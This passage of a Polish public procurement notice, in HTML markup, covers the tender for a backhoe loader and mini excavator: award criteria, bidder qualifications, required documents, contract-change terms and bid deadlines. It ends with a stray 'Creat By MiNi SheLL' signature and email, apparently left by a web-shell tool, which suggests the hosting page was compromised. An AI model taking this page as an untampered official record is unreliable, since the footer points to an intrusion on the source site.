ofercie<br/>C – ilość punktów w kryterium Cena<br/> Pk = ilość punktów w kryterium Okres gwarancji dla koparko-ładowarki<br/> Pm = ilość punktów w kryterium Okres gwarancji dla minikoparki<br/><br/>3 Zamawiający wybierze ofertę, która uzyska największą liczbę punktów.<br/>4	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną. Zamawiający wzywa Wykonawców, którzy złożyli oferty o takiej samej najniższej cenie, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych w zakresie dotyczącym ceny. Wykonawcy, składając oferty dodatkowe, nie mogą przedstawić ceny wyższej niż w złożonych ofertach.<br/>5	Wykonawca udzieli gwarancji zgodnie z zapisami we wzorze umowy stanowiącym załącznik Nr 1 do SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji dla koparko-ładowarki</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji dla minikoparki</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawcy ubiegający się o udzielenie przedmiotowego zamówienia muszą spełniać warunki udziału w postępowaniu dotyczące:<br/>1)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie precyzuje wymagań w zakresie tego warunku.<br/>2)	zdolności technicznej lub zawodowej – Zamawiający nie precyzuje wymagań <br/>w zakresie tego warunku.<br/>3)	zdolności technicznej lub zawodowej – Zamawiający uzna że ww. warunek zostanie spełniony, jeśli Wykonawca wykonał należycie w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, dostawy jednej koparko-ładowarki o minimalnej mocy 80 kW wraz z podaniem jej przedmiotu, daty wykonania i podmiotów na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie.<br/><br/>Okres wyrażony powyżej w latach liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia wykazu dostaw potwierdzających zdolność techniczną lub zawodową Wykonawcy do wykonania zamówienia, w wyznaczonym, nie krótszym niż 5 dni terminie według załącznika nr 7 do SWZ.<br/>Wykaz dostaw wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których dostawy te zostały wykonane z załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają powyższy warunek. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Prawo zamówień publicznych, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, według załącznika nr 6 do SWZ,<br/>b)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 5 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz dostaw wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których dostawy te zostały wykonane, według załącznika nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Na potwierdzenie spełnienia wymaganych parametrów technicznych koparko-ładowarki i minikoparki Wykonawca jest zobowiązany do złożenia razem z ofertą załącznika nr 2a do SWZ (tabel z charakterystyką oferowanej koparko-ładowarki i minikoparki). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Załącznik nr 2a do SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty sporządzony wg wzoru Formularza oferty stanowiącego załącznik nr 2. W przypadku złożenia oferty na innym formularzu niż załącznik nr 2 do SWZ, powinien on zawierać wszystkie wymagane informacje określone w tym załączniku. Formularz oferty nie podlega uzupełnieniu.<br/>Przedmiotowe środki dowodowe, o których mowa w punkcie 8.1 SWZ - załącznik nr 2a do SWZ (tabele z charakterystyką oferowanej koparko-ładowarki i minikoparki).<br/>Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, według załącznika nr 3 do SWZ. W przypadku wykonawców wspólnie ubiegających się o zamówienie przedmiotowe oświadczenie składa każdy z wykonawców.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie według wzoru stanowiącego załącznik nr 4c do SWZ.	<br/>Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, na zasadach określonych w art. 118 ustawy Pzp, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności dołączając do oferty zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, zgodnie z załącznikiem nr 4b do SWZ. Wykonawca może przedstawić też inny środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Z zobowiązania lub innych dokumentów potwierdzających udostępnienie zasobów przez inne podmioty musi bezspornie i jednoznacznie wynikać w szczególności: <br/>–	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>–	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>–	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunku udziału w postępowaniu dotyczących doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.	<br/>W odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane - w takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 4a do SWZ.	<br/>W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od Wykonawcy złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, przy czym, Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. Informację w tym zakresie wykonawca uzupełnia w załączniku nr 3 lub 4a do SWZ.	<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa powyżej W przypadku wspólnego ubiegania się o zamówienie przez wykonawców pełnomocnictwo podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli w imieniu każdego ze wspólników. Pełnomocnictwo musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie z art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem elektronicznym mocodawcy.<br/>2	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, o których mowa w rozdziale 6 SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie według załącznika nr 3 do SWZ. Oświadczenia potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3	W odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 4a do SWZ. <br/>4	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu - zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w pkt 9.2.<br/>5	Wykonawca, który polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, które Wykonawca zobowiązany jest dołączyć do oferty. Wzór zobowiązania stanowi załącznik nr 4b do SWZ. Z dokumentu (np. zobowiązania), o którym mowa w niniejszym punkcie musi wynikać w szczególności:<br/>a)	zakres dostępnych Wykonawcy zasobów innego podmiotu;<br/>b)	sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego;<br/>c)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Oprócz zmian przewidzianych ustawą, Zamawiający przewiduje możliwość zmian postanowień umowy w sprawie zamówienia w stosunku do treści wybranej oferty, dotyczących przedmiotu zamówienia, sposobu realizacji zamówienia oraz terminu realizacji umowy i terminu płatności a także wysokości wynagrodzenia wykonawcy, w szczególności w przypadku:<br/>1)	zmian w obowiązujących przepisach prawa, powodujących konieczność dokonania zmian w umowie,<br/>2)	w wyniku wstrzymania realizacji zamówienia przez zamawiającego na czas wykonania dodatkowych uzgodnień, badań, ekspertyz, analiz (zmiana terminu wykonania o czas trwania uzgodnień, badań, ekspertyz, analiz);<br/>3)	w zakresie obowiązującej stawki podatku VAT, w przypadku zmian powszechnie obowiązującego prawa w tym zakresie,<br/>4)	w przypadku dokonania określonych czynności lub ich zaniechania przez organy administracji państwowej, w tym organy administracji rządowej, samorządowej, jak również organów i podmiotów, których działalność wymaga wydania jakiejkolwiek decyzji o charakterze administracyjnym w trakcie wykonywania przedmiotu niniejszej umowy (zmiana terminu wykonania o czas trwania przeszkody);<br/>5)	zaistnienia siły wyższej rozumianej jako zdarzenia pozostające poza kontrolą każdej ze stron, których strony nie mogły przewidzieć ani im zapobiec, i które zakłócają lub uniemożliwiają realizację Umowy, takie zdarzenia obejmują w szczególności: wojny, rewolucje, pożary, powodzie, działania terrorystyczne, zakłócenia spowodowane wprowadzeniem zabezpieczeń antyterrorystycznych (zmiana terminu wykonania o czas trwania przeszkody);<br/>6)	W przypadku, kiedy konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z należytą starannością, nie mógł przewidzieć a wartość zmiany nie przekracza 10% wartości zamówienia określonej pierwotnie w umowie.<br/>7)	wstrzymania realizacji umowy przez zamawiającego na czas przeprowadzenia przez zamawiającego lub podmiot upoważniony kontroli jakości i sposobu realizacji umowy (zmiana terminu wykonania o czas trwania przeszkody);<br/>8)	wykazania przez Wykonawcę, iż zaoferowany sprzęt został wycofany ze sprzedaży lub zaprzestano jego produkcji, brak jest dostępu do niego na rynku polskim (potwierdzone przez producenta lub przedstawiciela handlowego na rynku polskim). Wykonawca musi wykazać, że dochował należytej staranności i posiadał zapewnienie o dostępności oferowanego urządzenia podczas składania oferty w postępowaniu Zamawiający dopuszcza możliwość zaoferowania i dostarczenia innego sprzętu pod warunkiem, że funkcjonalność i wydajność sprzętu nie będzie gorsza niż sprzętu zaoferowanego, a cena urządzenia nie ulegnie zmianie. Wykonawca musi uzyskać zgodę Zamawiającego na zmianę oferowanego sprzętu,<br/>2.	W opisanych przypadkach zmianie ulec mogą odpowiednio zakres rzeczowy przedmiotu zamówienia, cena umowy brutto, termin wykonania przedmiotu zamówienia, termin płatności, zasady rozliczeń (o ile zmiana zasad rozliczeń nie spowoduje konieczności zapłaty Wykonawcy odsetek lub wynagrodzenia w większej kwocie), sposób realizacji przedmiotu zamówienia, w tym zmiana materiałów lub technologii wykonania zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zakrzowek.ezamawiajacy.pl/pn/zakrzowek/demand/223537/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-04 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com